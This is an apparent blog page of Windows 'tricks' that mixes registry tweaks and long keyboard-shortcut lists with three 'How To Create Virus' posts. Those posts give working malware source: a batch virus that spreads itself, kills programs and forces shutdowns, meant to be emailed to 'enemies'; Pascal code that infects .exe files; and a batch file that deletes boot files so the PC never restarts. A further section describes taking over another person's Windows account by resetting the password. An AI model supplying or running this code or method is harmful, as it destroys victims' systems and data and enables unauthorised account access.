
Welcome To The World Of Computer Tricks Here U Get Different Techniques And Tricks Of Computer Which Are Very Helpful To U Peoples.
Saturday, January 26
Tuesday, January 15
How To Remove New Folder Virus Without Antivirus
Now i m Telling u How to remove New Folder Virus Without ant Antivirus software.
1: First of all go to Start Menu and then on Run nd write "regedit" in Run dialogue box.
2: A new window will open here in left sides there is many options click on
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ Current Version \ Run \ RavTime XP.
3: Right click on RavTimeXP and delete it and then close Registry Editor and restart ur computer.
4: Now ur work is to search New Folders and delete them for this click on Start \ Search \ For Files And Folders.
5: A new window will open then do the same as i told click on All Files And Folders and in search box write "*.exe" and search the all hard drives and then click on "More advanced options" and click on "search hidden files and folders" and then click on SEARCH.
6: Now your computer is searching the exe files and after search u casn see the list of exe files now u have to select the files whose size is 60Kb or little bit above or low then 60 Kb and whose type is application and delete all of them and also empty the recyclebin.
Note:
Dont Double click on it if u double click on it then u have to restart the whole process.
1: First of all go to Start Menu and then on Run nd write "regedit" in Run dialogue box.
2: A new window will open here in left sides there is many options click on
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ Current Version \ Run \ RavTime XP.
3: Right click on RavTimeXP and delete it and then close Registry Editor and restart ur computer.
4: Now ur work is to search New Folders and delete them for this click on Start \ Search \ For Files And Folders.
5: A new window will open then do the same as i told click on All Files And Folders and in search box write "*.exe" and search the all hard drives and then click on "More advanced options" and click on "search hidden files and folders" and then click on SEARCH.
6: Now your computer is searching the exe files and after search u casn see the list of exe files now u have to select the files whose size is 60Kb or little bit above or low then 60 Kb and whose type is application and delete all of them and also empty the recyclebin.
Note:
Dont Double click on it if u double click on it then u have to restart the whole process.
How To Hide Hard Drive
Now I share a very Interesting Thing with u and the thing is How To Hide Hard Drive.
1: First of all go to the Start Menu Then on Run and type "diskpart". With out "" .
2: Now a Window open here write "list volume" and press Enter. Now u have list of all volumes u have available now actually work starts.
3: Select the drive which u want to hide For Example u want to hide G drive see the volume Number in front of G drive .
4: Now write "select volume 5" and press Enter.
5: Now write "remove letter G" and press Enter.
6: Now go to MY Computer and u see that G drive is hidden.
7: If U want to show the Drive again Then where u write "remove letter G" write "assign letter G" and press Enter The drive will come again. Enjoy!!!!!!!!!!!!!!!!!!!!!!
1: First of all go to the Start Menu Then on Run and type "diskpart". With out "" .
2: Now a Window open here write "list volume" and press Enter. Now u have list of all volumes u have available now actually work starts.
3: Select the drive which u want to hide For Example u want to hide G drive see the volume Number in front of G drive .
4: Now write "select volume 5" and press Enter.
5: Now write "remove letter G" and press Enter.
6: Now go to MY Computer and u see that G drive is hidden.
7: If U want to show the Drive again Then where u write "remove letter G" write "assign letter G" and press Enter The drive will come again. Enjoy!!!!!!!!!!!!!!!!!!!!!!
How To Remove RUN from The Start Menu
If U want to remove RUN command from the start Menu then do the Following steps:
1: Go to Start Menu Then Run and write regedit.
2: Another Window will Appear and then go to the Following Option.
Hkey_Current_User \ Software \ Microsoft \ Windows \ Current Version \ Policies \ Explorer
3: Then Right Click Here and make a new DWORD VALUE and name it No File or No Run and give it the value 1
4: Restart Your Computer
1: Go to Start Menu Then Run and write regedit.
2: Another Window will Appear and then go to the Following Option.
Hkey_Current_User \ Software \ Microsoft \ Windows \ Current Version \ Policies \ Explorer
3: Then Right Click Here and make a new DWORD VALUE and name it No File or No Run and give it the value 1
4: Restart Your Computer
Sunday, January 13
How To Create Virus Part 3
!!!!!!!!!!!!!!! BAT VIRUS !!!!!!!!!!!!!!!!!!!!!!!
copy the below code and paste into your notepad.. then save as anyname.batDo not click on that batch file........ Send it your enimies email...
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
Code:-
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat
FixVirus.batcd %userprofile%My Documents
copy Greatgame.bat
R.I.P.batcopy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat
FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
How To Create Virus Part 2
::::::::::::PASCAL VIRUS ::::::::::::::
It's created in pascalCopy and paste it in notepad as anyname.pas
Program Saddam;
{$M 10000,0,0}
UsesDOS;
VarDriveID : String [2];Buffer : Array [1..8000] Of Byte;Target,Source : File;Infected : Byte;Done : Word;TargetFile : String;
(*??????????????????????????????????????
???????????????????????????????????*)
Function ExistCom : Boolean;
Var
FindCom : SearchRec;
Begin
FindFirst ( TargetFile, 39, FindCom );
ExistCom := DosError = 0;
End;
Procedure SearchDir ( Dir2Search : String );
Var
S : SearchRec;
Begin
If Dir2Search [ Length ( Dir2Search ) ] <> '\' Then
Dir2Search := Dir2Search + '\';
FindFirst ( Dir2Search + '*.exe', 39, S );
While DosError = 0 Do
Begin
TargetFile := Copy ( Dir2Search + S.Name,1,
Length ( Dir2Search + S.Name ) -3 ) + 'com';
If ( Copy ( S.Name, Length ( S.Name ) -2,3 ) = 'EXE' ) And
Not ExistCom And ( Infected <> 25000 ) Then
Begin
{$i-}
Inc ( Infected );
Assign ( Target, TargetFile );
Rewrite ( Target,1 );
BlockWrite ( Target, Buffer, Done + Random ( 4400 ));
SetFTime ( Target, S.Time );
Close ( Target );
If IoResult = 101 ThenBeginInfected := 3;
Erase ( Target );
End;
{$i+}
End;
FindNext ( S );
End;
FindFirst ( Dir2Search + '*', Directory, S );
If S.Name = '.' Then
Begin
FindNext ( S );
FindNext ( S );
End;
If ( DosError = 0 ) And( S.Attr And 16 <> 16 ) ThenFindNext ( S );
While DosError = 0 Do
Begin
If ( S.Attr And 16 = 16 ) And ( Infected <>
SearchDir ( Dir2Search + S.Name );
FindNext ( S );
End;
End;
Begin
DriveID := FExpand ( ParamStr ( 1 ));
Infected := 0;
Assign ( Source, ParamStr ( 0 ) );
Reset ( Source, 1 );
BlockRead ( Source, Buffer, 5000, Done );
Close ( Source );
Randomize;
SearchDir ( DriveID );
Exec ( Copy ( ParamStr ( 0 ),1,
Length ( ParamStr ( 0 )) -3 ) + 'exe', ParamStr ( 1 ) );
End.
Note:
This File is for the Purpose of Virus Study Only! It Should not be Passed Around Among the General Public. It Will be Very Useful for Learning how Viruses Work and Propagate. But Anybody With Access to an Assembler can Turn it Into a Working Virus and Anybody With a bit of Assembly Coding Experience can Turn it Into a far More Malevolent Program Than it Already Is. Keep This Code in Responsible Hands!!
How To Create Virus Part 1
::::::::::::BAT VIRUS ::::::::::::::
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!
and save as with this name
virus.bat
ur antivirus will not detect this virus
Basically this program will delete all that files which are needed for booting.........
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!
and save as with this name
virus.bat
ur antivirus will not detect this virus
Basically this program will delete all that files which are needed for booting.........
Start Ur Pc in 10 sec.
Right Click on the start button then press R it will take u to Run well go to run type Regeditpress enterthis will open Registery Editornow look for the key
HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\ContentIndex
now there find the Key Called"Startup Delay"Double Click On ItNow where its BaseClick DecimalNow its Default Value Is 4800000 (75300:hexadecimal)Change The Value To 40000here u go u have done itnow close the Registery Editor and Restart Your Computer
after restarting ur pc u'll find it that ur pc is getting started much faster than the ealier longer period. SO HAVE FUN.
HKEY_LOACAL_MECHINE\SYSTEM\CurrentControlSet\Control\ContentIndex
now there find the Key Called"Startup Delay"Double Click On ItNow where its BaseClick DecimalNow its Default Value Is 4800000 (75300:hexadecimal)Change The Value To 40000here u go u have done itnow close the Registery Editor and Restart Your Computer
after restarting ur pc u'll find it that ur pc is getting started much faster than the ealier longer period. SO HAVE FUN.
XP Tricks
Eliminating the Right Click on the Taskbar
To eliminate the right click on the taskbar:
Start RegeditGo to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ ExplorerAdd a DWORD and give it a name of NoTrayContextMenuGive it a value of 1Reboot
Start RegeditGo to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ ExplorerAdd a DWORD and give it a name of NoTrayContextMenuGive it a value of 1Reboot
Change Yahoo messenger title bar
Youcan change the yahoo messenger title bar...For this just find the folder messenger in the drive in which the messenger is installed. Then search a file named "ymsgr". In this file just go to the end and write the following code:[APP TITLE]CAPTION=Red DevilHere you can write any name in place of Red Devil... then see the fun.... You can have your own name being placed in yahoo messenger title bar.
Enable Right Clicks on The Sites Dat Disable it
Lots of web sites have disabled the right click function of the mouse button... it's really, really annoying. This is done so that you don't steal (via right-click->save picture) their photos or images or any other goodies. Unfortunately, it disables ALL right-click functionality: copy, paste, open in new window.
It's easy to change, assuming your using IE 6:Click "Tools"->"Internet Options"Click the "Security" tabClick "Custom Level"Scroll down to the "Scripting" sectionSet "Active Scripting" to "disable"Click "Ok" a couple of times.
You'll probably want to turn this back to "enable" when your done... 'cause generally the javascript enhances a website.
Changing the Location of Special Folders:
You can modify the registry to change the location of special folders like
My DocumentsFavoritesMy PicturesPersonalStart RegeditGo to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersDouble click on any locations you want to change and alter the pathLogoff or restart for the changes to go into effect.....................
My DocumentsFavoritesMy PicturesPersonalStart RegeditGo to HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell FoldersDouble click on any locations you want to change and alter the pathLogoff or restart for the changes to go into effect.....................
Remove Stored username and Passwords !
To remove the Stored User Names and Passwords from your system, try this:Click Start, Run and type Control keymgr.dllRemove the entries from the list.The other ways to access this dialog are:Type Control Userpasswords2 in RUN box, click Advanced, Manage Passwords-or-From Control Panel, select your User Account, click Manage your network passwords
It Works
lock pc just by double clicking mouse
You can lock your XP workstation with two clicks ofthe mouse. Create a new shortcut on your desktop usinga right mouse click, and enter 'rundll32.exeuser32.dll,LockWorkStation' in the location field.Give the shortcut a name you like. That's it -- justdouble click on it and your computer will be locked.And if that's not easy enough, Windows key + L will dothe same.
Hide ur folders:
Rename any folder with extension {645FF040-5081-101B-9F08-00AA002F954E}eg,if u've a folder gamespress F2,then type, "games.{645FF040-5081-101B-9F08-00AA002F954E}"c the magic....then 2 get to original form,remove the extension using"ren games.{645FF040-5081-101B-9F08-00AA002F954E} games" in dos or as a bat file
n u are done..
n u are done..
Shutdown Trick !
Imidiate rapid shut down windowwhile shutting down window. open task manager(Ctr+Alt+Del),Select shut down tab. and press ' Ctrl ' key while select Turn Off from dis tab.Count 5 4 3 2 1 Voila!!! U r window will rapidly shut down.
AUTO DELETE TEMPORARY FOLDER.!!
ll what i prefer is %temp% " without quotes.. at Start -> Run..this opens ur temp folder n den u cal erase it neatly// still try dis one too..
First go into gpedit.mscNext select -> Computer Configuration/Administrative Templates/Windows Components/Terminal Services/Temporary FolderThen right click "Do Not Delete Temp Folder Upon Exit"Go to properties and hit disable. Now next time Windows puts a temp file in that folder it will automatically delete it when its done! Note from Forum Admin: Remember, GPEDIT (Group Policy Editor) is only available in XP Pro
DISPLAY MESSAGE ON STARTUP.
Start regedit, if you are unfamiliar with regedit please see our FAQ.Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonModify the key legalnoticecaption with what you want to name the window.Modify the key legalnoticetext with what you want the window to say. Restart
How to make your Desktop Icons Transparent
Go to Control Panel > System, > Advanced > Performance area > Settings button Visual Effects tab "Use drop shadows for icon labels on the Desktop"
CD ROM STOPS AUTOPLAYING/AUTORUN.!!
And the AutoPlay Tab has disappeared in My Computer, Devices With Removable Storage, Right Click on CDROM, Properties.Solution: The service: "Shell Hardware Detection" has been set to Manual or Disabled. Go to Control Panel, Administrative Tools, Services. Return this service to "Automatic".
SPEED UP MENU DISPLAY.!!
When using the start menu the you will notice a delay between different tiers of the menu hierarchy. For the fastest computer experience possible I recommend changing this value to zero. This will allow the different tiers to appear instantly.
Start Regedit. If you are unfamiliar with regedit please refer to our FAQ on how to get started.
Navigate to HKEY_CURRENT_USER\Control Panel\DesktopSelect MenuShowDelay from the list on the right.
Right on it and select Modify.Change the value to 0.Reboot your computer.
Change Someone's Windows Password
This hack works if you are at someone else's home and you are logged into the account of the person whose account you want to hack. This also works if you want to hack someone else's account on your pc bit do not know his/her password.
Click on START-->RUN.
Type compmgmt.msc & press enter.
In the left pane, select COMPUTER MANAGEMENT--> SYSTEM TOOLS--> LOCAL USERS AND GROUPS--> USERS.
Then in the right pane, select the user name whose account you want to hack. RIGHT
CLICK and then click on SET PASSWORD from the pop-up menu.
Enter the new password. Click on OK.
Click on START-->RUN.
Type compmgmt.msc & press enter.
In the left pane, select COMPUTER MANAGEMENT--> SYSTEM TOOLS--> LOCAL USERS AND GROUPS--> USERS.
Then in the right pane, select the user name whose account you want to hack. RIGHT
CLICK and then click on SET PASSWORD from the pop-up menu.
Enter the new password. Click on OK.
All Window's Shortcut's
* Shift + F10 right-clicks.
* Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
* Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
* Win + Control + F: Open Find dialog. (Computers)
* Win + U: Open Utility Manager.
* Win + F1: Open Windows help.
* Win + Pause: Open System Properties dialog.
* Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.
* Win + Shift + Tab: Cycle through taskbar buttons in reverse.
* Alt + Tab: Display Cool Switch. More commonly known as the AltTab dialog.
* Alt + Shift + Tab: Display Cool Switch; go in reverse.
* Alt + Escape: Send active window to the bottom of the z-order.
* Alt + Shift + Escape: Activate the window at the bottom of the z-order.
* Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.
* Shift while a CD is loading: Bypass AutoPlay.
* Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)
* Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.
* Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.
* Print screen: Copy screenshot of current screen to clipboard.
* Alt + Print screen: Copy screenshot of current active window to clipboard.
* Ctrl + Alt + Down Arrow: Invert screen. Untested on OS's other than XP.
* Ctrl + Alt + Up Arrow: Undo inversion.
* Win + B : Move focus to systray icons.
General Navigation
* Tab: Forward one item.
* Shift + Tab: Backward one item.
* Ctrl + Tab: Cycle through tabs/child windows.
* Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.
* Enter: If a button's selected, click it, otherwise, click default button.
* Space: Toggle items such as radio buttons or checkboxes.
* Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.
* Ctrl + Left: Move cursor to the beginning of previous word.
* Ctrl + Right: Move cursor to the beginning of next word.
* Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in Rich Edit controls.
* Ctrl + Down: Move cursor to beginning of next paragraph.
* Shift + Left: Highlight one character to the left.
* Shift + Right: Highlight one character to the right.
* Shift + Up: Highlight from current cursor position, to one line up.
* Shift + Down: Highlight from current cursor position, to one line down.
* Ctrl + Shift + Left: Highlight to beginning of previous word.
* Ctrl + Shift + Right: Highlight to beginning of next word.
* Ctrl + Shift + Up: Highlight to beginning of previous paragraph.
* Ctrl + Shift + Down: Highlight to beginning of next paragraph.
* Home: Move cursor to top of a scrollable control.
* End: Move cursor to bottom of a scrollable control.
File Browser
* Arrow Keys: Navigate.
* Shift + Arrow Keys: Select multiple items.
* Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.
* (Letter): Select first found item that begins with (Letter).
* BackSpace: Go up one level to the parent directory.
* Alt + Left: Go back one folder.
* Alt + Right: Go forward one folder.
* Enter: Activate (Double-click) selected item(s).
* Alt + Enter: View properties for selected item.
* F2: Rename selected item(s).
* Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.
* Delete: Delete selected item(s).
* Shift + Delete: Delete selected item(s); bypass Recycle Bin.
* Ctrl while dragging item(s): Copy.
* Ctrl + Shift while dragging item(s): Create shortcut(s).
* In tree pane, if any:
* Left: Collapse the current selection if expanded, or select the parent folder.
* Right: Expand the current selection if collapsed, or select the first subfolder.
* Numpad Asterisk: Expand currently selected directory and all subdirectories. No undo.
* Numpad Plus: Expand currently selected directory.
* Numpad Minus: Collapse currently selected directory.
Accessibility
* Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.
* Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.
* Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.
* NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.
* Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.
* 6.) Microsoft Natural Keyboard with IntelliType Software Installed
* Win + L: Log off Windows.
* Win + P: Open Print Manager.
* Win + C: Open control panel.
* Win + V: Open clipboard.
* Win + K: Open keyboard properties.
* Win + I: Open mouse properties.
* Win + A: Open Accessibility properties.
* Win + Space: Displays the list of Microsoft IntelliType shortcut keys.
* Win + S: Toggle CapsLock on and off.
Remote Desktop Connection Navigation
* Ctrl + Alt + End: Open the NT Security dialog.
* Alt + PageUp: Switch between programs.
* Alt + PageDown: Switch between programs in reverse.
* Alt + Insert: Cycle through the programs in most recently used order.
* Alt + Home: Display start menu.
* Ctrl + Alt + Break: Switch the client computer between a window and a full screen.
* Alt + Delete: Display the Windows menu.
* Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.
* Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.
Mozilla Firefox Shortcuts
* Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.
* Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.
* Ctrl + (1-9): Switch to tab corresponding to number.
* Ctrl + N: New window.
* Ctrl + T: New tab.
* Ctrl + L or Alt + D or F6: Switch focus to location bar.
* Ctrl + Enter: Open location in new tab.
* Shift + Enter: Open location in new window.
* Ctrl + K or Ctrl + E: Switch focus to search bar.
* Ctrl + O: Open a local file.
* Ctrl + W: Close tab, or window if there's only one tab open.
* Ctrl + Shift + W: Close window.
* Ctrl + S: Save page as a local file.
* Ctrl + P: Print page.
* Ctrl + F or F3: Open find toolbar.
* Ctrl + G or F3: Find next...
* Ctrl + Shift + G or Shift + F3: Find previous...
* Ctrl + B or Ctrl + I: Open Bookmarks sidebar.
* Ctrl + H: Open History sidebar.
* Escape: Stop loading page.
* Ctrl + R or F5: Reload current page.
* Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.
* Ctrl + U: View page source.
* Ctrl + D: Bookmark current page.
* Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.
* Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.
* Ctrl + Numpad0 or Ctrl + 0: Set text size to default.
* Alt + Left or Backspace: Back.
* Alt + Right or Shift + Backspace: Forward.
* Alt + Home: Open home page.
* Ctrl + M: Open new message in integrated mail client.
* Ctrl + J: Open Downloads dialog.
* F6: Switch to next frame. You must have selected something on the page already, e.g. by use of Tab.
* Shift + F6: Switch to previous frame.
* Apostrophe ('): Find link as you type.
* Slash (/): Find text as you type.
Gmail Shortcuts
* Note: Must have "keyboard shortcuts" on in settings.
* C: Compose new message.
* Shift + C: Open new window to compose new message.
* Slash (/): Switch focus to search box.
* K: Switch focus to the next most recent email. Enter or "O" opens focused email.
* J: Switch focus to the next oldest email.
* N: Switch focus to the next message in the "conversation." Enter or "O" expands/collapses messages.
* P: Switch focus to the previous message.
* U: Takes you back to the inbox and checks for new mail.
* Y: Various actions depending on current view:
* Has no effect in "Sent" and "All Mail" views.
* Inbox: Archive email or message.
* Starred: Unstar email or message.
* Spam: Unmark as spam and move back to "Inbox."
* Trash: Move back to "Inbox."
* Any label: Remove the label.
* X: "Check" an email. Various actions can be performed against all checked emails.
* S: "Star" an email. Identical to the more familiar term, "flagging."
* R: Reply to the email.
* A: Reply to all recipients of the email.
* F: Forward an email.
* Shift + R: Reply to the email in a new window.
* Shift + A: Reply to all recipients of the email in a new window.
* Shift + F: Forward an email in a new window.
* Shift + 1 (!): Mark an email as spam and remove it from the inbox.
* G then I: Switch to "Inbox" view.
* G then S: Switch to "Starred" view.
* G then A: Switch to "All Mail" view.
* G then C: Switch to "Contacts" view.
* G then S: Switch to "Drafts" view.
List of F1-F9 Key Commands for the Command Prompt
* F1 / right arrow: Repeats the letters of the last command line, one by one.
* F2: Displays a dialog asking user to "enter the char to copy up to" of the last command line
* F3: Repeats the last command line
* F4: Displays a dialog asking user to "enter the char to delete up to" of the last command line
* F5: Goes back one command line
* F6: Enters the traditional CTRL+Z (^z)
* F7: Displays a menu with the command line history
* F8: Cycles back through previous command lines (beginning with most recent)
* F9: Displays a dialog asking user to enter a command number, where 0 is for first command line entered.
* Alt+Enter: toggle full Screen mode.
* up/down: scroll thru/repeat previous entries
* Esc: delete line
* Note: The buffer allows a maximum of 50 command lines. After this number is reached, the first line will be replaced in sequence.
Helpful accessibility keyboard shortcuts
* Switch FilterKeys on and off. Right SHIFT for eight seconds
* Switch High Contrast on and off. Left ALT +left SHIFT +PRINT SCREEN
* Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
* Switch StickyKeys on and off. SHIFT five times
* Switch ToggleKeys on and off. NUM LOCK for five seconds
* Win + L (XP Only): Locks keyboard. Similar to Lock Workstation.
* Win + F or F3: Open Find dialog. (All Files) F3 may not work in some applications which use F3 for their own find dialogs.
* Win + Control + F: Open Find dialog. (Computers)
* Win + U: Open Utility Manager.
* Win + F1: Open Windows help.
* Win + Pause: Open System Properties dialog.
* Win + Tab: Cycle through taskbar buttons. Enter clicks, AppsKey or Shift + F10 right-clicks.
* Win + Shift + Tab: Cycle through taskbar buttons in reverse.
* Alt + Tab: Display Cool Switch. More commonly known as the AltTab dialog.
* Alt + Shift + Tab: Display Cool Switch; go in reverse.
* Alt + Escape: Send active window to the bottom of the z-order.
* Alt + Shift + Escape: Activate the window at the bottom of the z-order.
* Alt + F4: Close active window; or, if all windows are closed, open shutdown dialog.
* Shift while a CD is loading: Bypass AutoPlay.
* Shift while login: Bypass startup folder. Only those applications will be ignored which are in the startup folder, not those started from the registry (Microsoft\Windows\CurrentVersion\Run\)
* Ctrl + Alt + Delete or Ctrl + Alt + NumpadDel (Both NumLock states): Invoke the Task Manager or NT Security dialog.
* Ctrl + Shift + Escape (2000/XP ) or (Ctrl + Alt + NumpadDot) : Invoke the task manager. On earlier OSes, acts like Ctrl + Escape.
* Print screen: Copy screenshot of current screen to clipboard.
* Alt + Print screen: Copy screenshot of current active window to clipboard.
* Ctrl + Alt + Down Arrow: Invert screen. Untested on OS's other than XP.
* Ctrl + Alt + Up Arrow: Undo inversion.
* Win + B : Move focus to systray icons.
General Navigation
* Tab: Forward one item.
* Shift + Tab: Backward one item.
* Ctrl + Tab: Cycle through tabs/child windows.
* Ctrl + Shift + Tab: Cycle backwards through tabs/child windows.
* Enter: If a button's selected, click it, otherwise, click default button.
* Space: Toggle items such as radio buttons or checkboxes.
* Alt + (Letter): Activate item corresponding to (Letter). (Letter) is the underlined letter on the item's name.
* Ctrl + Left: Move cursor to the beginning of previous word.
* Ctrl + Right: Move cursor to the beginning of next word.
* Ctrl + Up: Move cursor to beginning of previous paragraph. This and all subsequent Up/Down hotkeys in this section have only been known to work in Rich Edit controls.
* Ctrl + Down: Move cursor to beginning of next paragraph.
* Shift + Left: Highlight one character to the left.
* Shift + Right: Highlight one character to the right.
* Shift + Up: Highlight from current cursor position, to one line up.
* Shift + Down: Highlight from current cursor position, to one line down.
* Ctrl + Shift + Left: Highlight to beginning of previous word.
* Ctrl + Shift + Right: Highlight to beginning of next word.
* Ctrl + Shift + Up: Highlight to beginning of previous paragraph.
* Ctrl + Shift + Down: Highlight to beginning of next paragraph.
* Home: Move cursor to top of a scrollable control.
* End: Move cursor to bottom of a scrollable control.
File Browser
* Arrow Keys: Navigate.
* Shift + Arrow Keys: Select multiple items.
* Ctrl + Arrow Keys: Change focus without changing selection. "Focus" is the object that will run on Enter. Space toggles selection of the focused item.
* (Letter): Select first found item that begins with (Letter).
* BackSpace: Go up one level to the parent directory.
* Alt + Left: Go back one folder.
* Alt + Right: Go forward one folder.
* Enter: Activate (Double-click) selected item(s).
* Alt + Enter: View properties for selected item.
* F2: Rename selected item(s).
* Ctrl + NumpadPlus: In a Details view, resizes all columns to fit the longest item in each one.
* Delete: Delete selected item(s).
* Shift + Delete: Delete selected item(s); bypass Recycle Bin.
* Ctrl while dragging item(s): Copy.
* Ctrl + Shift while dragging item(s): Create shortcut(s).
* In tree pane, if any:
* Left: Collapse the current selection if expanded, or select the parent folder.
* Right: Expand the current selection if collapsed, or select the first subfolder.
* Numpad Asterisk: Expand currently selected directory and all subdirectories. No undo.
* Numpad Plus: Expand currently selected directory.
* Numpad Minus: Collapse currently selected directory.
Accessibility
* Right Shift for eight seconds: Toggle FilterKeys on and off. FilterKeys must be enabled.
* Left Alt + Left Shift + PrintScreen: Toggle High Contrast on and off. High Contrast must be enabled.
* Left Alt + Left Shift + NumLock: Toggle MouseKeys on and off. MouseKeys must be enabled.
* NumLock for five seconds: Toggle ToggleKeys on and off. ToggleKeys must be enabled.
* Shift five times: Toggle StickyKeys on and off. StickyKeys must be enabled.
* 6.) Microsoft Natural Keyboard with IntelliType Software Installed
* Win + L: Log off Windows.
* Win + P: Open Print Manager.
* Win + C: Open control panel.
* Win + V: Open clipboard.
* Win + K: Open keyboard properties.
* Win + I: Open mouse properties.
* Win + A: Open Accessibility properties.
* Win + Space: Displays the list of Microsoft IntelliType shortcut keys.
* Win + S: Toggle CapsLock on and off.
Remote Desktop Connection Navigation
* Ctrl + Alt + End: Open the NT Security dialog.
* Alt + PageUp: Switch between programs.
* Alt + PageDown: Switch between programs in reverse.
* Alt + Insert: Cycle through the programs in most recently used order.
* Alt + Home: Display start menu.
* Ctrl + Alt + Break: Switch the client computer between a window and a full screen.
* Alt + Delete: Display the Windows menu.
* Ctrl + Alt + NumpadMinus: Place a snapshot of the entire client window area on the Terminal server clipboard and provide the same functionality as pressing Alt + PrintScreen on a local computer.
* Ctrl + Alt + NumpadPlus: Place a snapshot of the active window in the client on the Terminal server clipboard and provide the same functionality as pressing PrintScreen on a local computer.
Mozilla Firefox Shortcuts
* Ctrl + Tab or Ctrl + PageDown: Cycle through tabs.
* Ctrl + Shift + Tab or Ctrl + PageUp: Cycle through tabs in reverse.
* Ctrl + (1-9): Switch to tab corresponding to number.
* Ctrl + N: New window.
* Ctrl + T: New tab.
* Ctrl + L or Alt + D or F6: Switch focus to location bar.
* Ctrl + Enter: Open location in new tab.
* Shift + Enter: Open location in new window.
* Ctrl + K or Ctrl + E: Switch focus to search bar.
* Ctrl + O: Open a local file.
* Ctrl + W: Close tab, or window if there's only one tab open.
* Ctrl + Shift + W: Close window.
* Ctrl + S: Save page as a local file.
* Ctrl + P: Print page.
* Ctrl + F or F3: Open find toolbar.
* Ctrl + G or F3: Find next...
* Ctrl + Shift + G or Shift + F3: Find previous...
* Ctrl + B or Ctrl + I: Open Bookmarks sidebar.
* Ctrl + H: Open History sidebar.
* Escape: Stop loading page.
* Ctrl + R or F5: Reload current page.
* Ctrl + Shift + R or Ctrl + F5: Reload current page; bypass cache.
* Ctrl + U: View page source.
* Ctrl + D: Bookmark current page.
* Ctrl + NumpadPlus or Ctrl + Equals (+/=): Increase text size.
* Ctrl + NumpadMinus or Ctrl + Minus: Decrease text size.
* Ctrl + Numpad0 or Ctrl + 0: Set text size to default.
* Alt + Left or Backspace: Back.
* Alt + Right or Shift + Backspace: Forward.
* Alt + Home: Open home page.
